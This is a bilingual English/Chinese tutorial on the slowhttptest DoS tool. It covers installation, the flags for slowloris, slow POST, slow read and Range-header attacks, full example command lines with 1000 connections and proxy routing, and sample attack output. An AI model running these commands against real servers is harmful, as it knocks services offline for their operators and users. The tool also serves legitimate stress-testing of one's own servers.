slowhttptest
Application Layer DoS attacks tool
support below
　slowloris, Slow HTTP POST, Slow Read attack (concurrent connections consumption)
　Apache Range Header attack ( memory and CPU consumption, CVE-2011-3192)

refer
https://code.google.com/p/slowhttptest/
Slow Read DoS attack explained
http://www.xlgps.com/article/53972.html

.......................................

Download
https://code.google.com/p/slowhttptest/downloads/list

Installation
$ tar -xzvf slowhttptest-x.x.tar.gz
$ cd slowhttptest-x.x
$ ./configure --prefix=< PREFIX>
$ make
$ sudo make install

test your tool
$< PREFIX>/bin/slowhttptest

........................................................................................

基本攻擊

1.choose attack type
-B : enables slow POST test
-H : enables slow head test
-X : enables slow read test
-R : enables range test

2.choose target
-u < URL> :target URL, format is http[s]://< host [:port] >
ex:-u https://myseceureserverl

3.choose basic paramater
-c < number> :number of connections , limited to 65539, default 50
-r < number> :connections per second connection rate, default 50

ps:有些linux本身會限制4000個連線,若工具超過此數值一樣僅使用4000連線,若非將linux限制解除

refer
https://github.com/shekyan/slowhttptest/wiki/InstallationAndUsage

.................................................

optinoal. paramater for information

-p < sec> :seconds timeout to wait for HTTP response on probe connection, after which server is considered inaccessible, default 5

-g : generate statistics in CSV and HTML formats, pattern is slow_xxx.csv/html, where xxx is the time and date

-o < string> ex: -o my_body_stats

-v < level>
level1: default, every 5 seconds showing status of connections
level4 : full traffic dump

...

other paramater

-l < sec>: test duration in seconds, default 240
-t < custom string>: verb custom verb to use
ex: -t FAKEVERB

代理伺服器
-d < proxy host>: for directing all traffic through web proxy
-e < proxy host>: for directing only probe traffic through web proxy

..........................................................................................

指定進階攻擊

post or header attack

-i < sec> :interval between follow up data per connection, default 10
每隔幾秒送一次資料
ex:
-i 100
Interval between follow up data 100 seconds

指定body一次送出的資料量 ?
-x < byte> : max length of follow up data
ex:
-x 1 or -x 2
Test parameters: follow up data max size: 8
-x 3
Test parameters: follow up data max size: 10
-x 24
Test parameters: follow up data max size: 52
ps:
head產生的最後值是輸入值*2+4
post產生的最後值是輸入值*2+2
ps:
最後實際與目標協商後的值還會變，此值僅供參考

指定post body長度,
-s < byte> : Content-Length header value, default 4096 , if -B specified
ps: header不適用, 因為預設會一直傳( 也就是不傳送結束字元/r/n)

message body mode (post)
ex:
slowhttptest -c 1000 -B -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserverl -x 10 -p 3
slowloris mode (header)
ex:
slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://myseceureserver -x 24 -p 3

.........

read attack

指定windows size隨機範圍
-w < byte> :bytes start of range the advertised window size would be picked from
-y < byte> : bytes end of range the advertised window size would be picked from
ex:
-w 10 -y 20 would make below
receive window range: 10 - 20
ps:
此值和目標協商後，最後的值會不同

-n < sec> :seconds interval between read operations from receive buffer, default=1
-z < bytes> :to read from receive buffer with single read() operation, default=5
ex:
-z 32 -n 5 would make below
read rate from receive buffer: 32 bytes / 5 sec

-k < number> :pipeline factor number of times to repeat the request in the same connection for slow read test if server supports HTTP pipe-lining.
server要先支援此功能
ex:
-k 10
Test parameters: Pipeline factor 10
ps:
Pipelined Connections : 在一個connection 中同步發送 HTTP requests HTTP 1.1 允許在 persistent connections使用 Pipelining，在 response 回來前，就先發送多個request，在 high-latency 的網路環境中可以大大改善效能。
refer( https://ihower.tw/blog/archives/1517 )

slow read
ex:
slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://someserver -p 5 -l 350

slow read mode with probing through proxy
ex:
slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://someserver -p 5 -l 350 -e x.x.x.x:8080

...............................................................................

攻擊畫面如下：

Test parameters
Test type SLOW BODY
Number of connections 6000
Verb POST
Content-Length header value 4096
Extra data max length14
Interval between follow up data 30 seconds
Connections per seconds 200
Timeout for probe connection 3
Target test duration240 seconds
Using proxy no proxy

Test parameters
Test type SLOW HEADERS
Number of connections 6000
Verb GET
Content-Length header value 4096
Extra data max length 52
Interval between follow up data 10 seconds
Connections per seconds 200
Timeout for probe connection 3
Target test duration 240 seconds
Using proxy no proxy

Test parameters
Test type SLOW READ
Number of connections 6000
Receive window range 5 - 15
Pipeline factor 1
Read rate from receive buffer 10 bytes / 3 sec
Connections per seconds 200
Timeout for probe connection 10
Target test duration 240 seconds
Using proxy no proxy